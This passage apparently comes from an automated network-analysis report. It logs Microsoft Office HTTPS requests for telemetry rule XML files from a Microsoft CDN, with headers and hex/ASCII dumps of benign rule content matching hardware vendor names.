                                                  x-azure-ref: 20241013T173418Z-17db6f7c8cf8rgvlb86c9c0098000000037g00000000f7cr
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:18 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  39192.168.2.44980513.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:18 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:18 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:18 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 632
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                  ETag: "0x8DC582BB6E3779E"
                                                  x-ms-request-id: e4dd17a3-501e-007b-21d7-1a5ba2000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173418Z-17db6f7c8cf4g2pjavqhm24vp400000005f00000000052ba
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:18 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  40192.168.2.44980213.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:18 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:18 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:18 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 474
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                  ETag: "0x8DC582B9964B277"
                                                  x-ms-request-id: 6aeebda2-001e-008d-31ea-1ad91e000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173418Z-17db6f7c8cfbr2wt66emzt78g400000004q000000000cfd3
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:18 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  41192.168.2.44980413.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:18 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:18 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:18 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 471
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                  ETag: "0x8DC582BB10C598B"
                                                  x-ms-request-id: a417ae39-101e-008e-1f1c-1bcf88000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173418Z-17db6f7c8cfqkqk8bn4ck6f72000000004v000000000huwh
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:18 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  42192.168.2.44980613.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:18 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:18 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:18 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 467
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                  ETag: "0x8DC582BA6C038BC"
                                                  x-ms-request-id: dbc5b3b7-c01e-00a2-28e5-1a2327000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173418Z-17db6f7c8cfspvtq2pgqb2w5k00000000550000000004q67
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:18 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  43192.168.2.44980713.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:19 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:19 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:19 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 407
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                  ETag: "0x8DC582BBAD04B7B"
                                                  x-ms-request-id: 0f9ac3ff-201e-0003-4016-1cf85a000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173419Z-17db6f7c8cfcrfgzd01a8emnyg00000002ng00000000emzr
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:19 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  44192.168.2.44981013.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:19 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:19 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:19 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 427
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                  ETag: "0x8DC582BA310DA18"
                                                  x-ms-request-id: c03f5215-301e-005d-4a1d-1ce448000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173419Z-17db6f7c8cfpm9w8b1ybgtytds0000000370000000002yng
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:19 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  45192.168.2.44980813.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:19 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:19 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:19 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 486
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                  ETag: "0x8DC582BB344914B"
                                                  x-ms-request-id: aec2753b-d01e-007a-1ef5-1cf38c000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173419Z-17db6f7c8cf6f7vv3recfp4a6w00000002900000000080cb
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:19 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  46192.168.2.44981113.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:19 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:19 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:19 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 486
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                  ETag: "0x8DC582B9018290B"
                                                  x-ms-request-id: 4a155f70-001e-0017-2dd7-1a0c3c000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173419Z-17db6f7c8cfvzwz27u5rnq9kpc00000005k0000000005zfv
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:19 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  47192.168.2.44980913.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:19 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:19 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:19 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 407
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                  ETag: "0x8DC582B9698189B"
                                                  x-ms-request-id: e456ac6c-b01e-0097-6bbf-1a4f33000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173419Z-17db6f7c8cfqkqk8bn4ck6f72000000004zg000000007wpa
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:19 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  48192.168.2.44981413.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:19 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:19 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:19 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 477
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                  ETag: "0x8DC582BB8CEAC16"
                                                  x-ms-request-id: 0c32318b-701e-0098-6762-1c395f000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173419Z-17db6f7c8cfgqlr45m385mnngs00000003pg00000000g4mk
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-13 17:34:19 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  49192.168.2.44981213.107.246.45443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:34:19 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-13 17:34:19 UTC470INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:34:19 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 469
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                  ETag: "0x8DC582BBA701121"
                                                  x-ms-request-id: 3826920f-501e-0078-42aa-1b06cf000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241013T173419Z-17db6f7c8cf6qp7g7r97wxgbqc00000004gg00000000af9p
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
